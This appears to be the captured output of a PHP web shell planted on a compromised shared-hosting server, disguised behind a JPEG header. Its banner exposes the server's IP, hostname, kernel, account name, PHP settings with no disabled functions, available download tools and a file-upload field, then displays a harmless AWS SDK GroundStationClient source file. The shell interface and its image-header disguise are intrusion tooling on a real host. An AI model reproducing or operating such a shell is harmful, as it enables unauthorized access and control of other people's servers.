����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.21.122.130 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/public_html/vendor/aws/aws-sdk-php/src/GroundStation/ |
Upload File : |
<?php namespace Aws\GroundStation; use Aws\AwsClient; /** * This client is used to interact with the **AWS Ground Station** service. * @method \Aws\Result cancelContact(array $args = []) * @method \GuzzleHttp\Promise\Promise cancelContactAsync(array $args = []) * @method \Aws\Result createConfig(array $args = []) * @method \GuzzleHttp\Promise\Promise createConfigAsync(array $args = []) * @method \Aws\Result createDataflowEndpointGroup(array $args = []) * @method \GuzzleHttp\Promise\Promise createDataflowEndpointGroupAsync(array $args = []) * @method \Aws\Result createMissionProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise createMissionProfileAsync(array $args = []) * @method \Aws\Result deleteConfig(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteConfigAsync(array $args = []) * @method \Aws\Result deleteDataflowEndpointGroup(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteDataflowEndpointGroupAsync(array $args = []) * @method \Aws\Result deleteMissionProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteMissionProfileAsync(array $args = []) * @method \Aws\Result describeContact(array $args = []) * @method \GuzzleHttp\Promise\Promise describeContactAsync(array $args = []) * @method \Aws\Result getMissionProfileConfig(array $args = []) * @method \GuzzleHttp\Promise\Promise getMissionProfileConfigAsync(array $args = []) * @method \Aws\Result getDataflowEndpointGroup(array $args = []) * @method \GuzzleHttp\Promise\Promise getDataflowEndpointGroupAsync(array $args = []) * @method \Aws\Result getMinuteUsage(array $args = []) * @method \GuzzleHttp\Promise\Promise getMinuteUsageAsync(array $args = []) * @method \Aws\Result getMissionProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise getMissionProfileAsync(array $args = []) * @method \Aws\Result getSatellite(array $args = []) * @method \GuzzleHttp\Promise\Promise getSatelliteAsync(array $args = []) * @method \Aws\Result listConfigs(array $args = []) * @method \GuzzleHttp\Promise\Promise listConfigsAsync(array $args = []) * @method \Aws\Result listContacts(array $args = []) * @method \GuzzleHttp\Promise\Promise listContactsAsync(array $args = []) * @method \Aws\Result listDataflowEndpointGroups(array $args = []) * @method \GuzzleHttp\Promise\Promise listDataflowEndpointGroupsAsync(array $args = []) * @method \Aws\Result listGroundStations(array $args = []) * @method \GuzzleHttp\Promise\Promise listGroundStationsAsync(array $args = []) * @method \Aws\Result listMissionProfiles(array $args = []) * @method \GuzzleHttp\Promise\Promise listMissionProfilesAsync(array $args = []) * @method \Aws\Result listSatellites(array $args = []) * @method \GuzzleHttp\Promise\Promise listSatellitesAsync(array $args = []) * @method \Aws\Result listTagsForResource(array $args = []) * @method \GuzzleHttp\Promise\Promise listTagsForResourceAsync(array $args = []) * @method \Aws\Result reserveContact(array $args = []) * @method \GuzzleHttp\Promise\Promise reserveContactAsync(array $args = []) * @method \Aws\Result tagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise tagResourceAsync(array $args = []) * @method \Aws\Result untagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise untagResourceAsync(array $args = []) * @method \Aws\Result updateConfig(array $args = []) * @method \GuzzleHttp\Promise\Promise updateConfigAsync(array $args = []) * @method \Aws\Result updateMissionProfile(array $args = []) * @method \GuzzleHttp\Promise\Promise updateMissionProfileAsync(array $args = []) */ class GroundStationClient extends AwsClient {}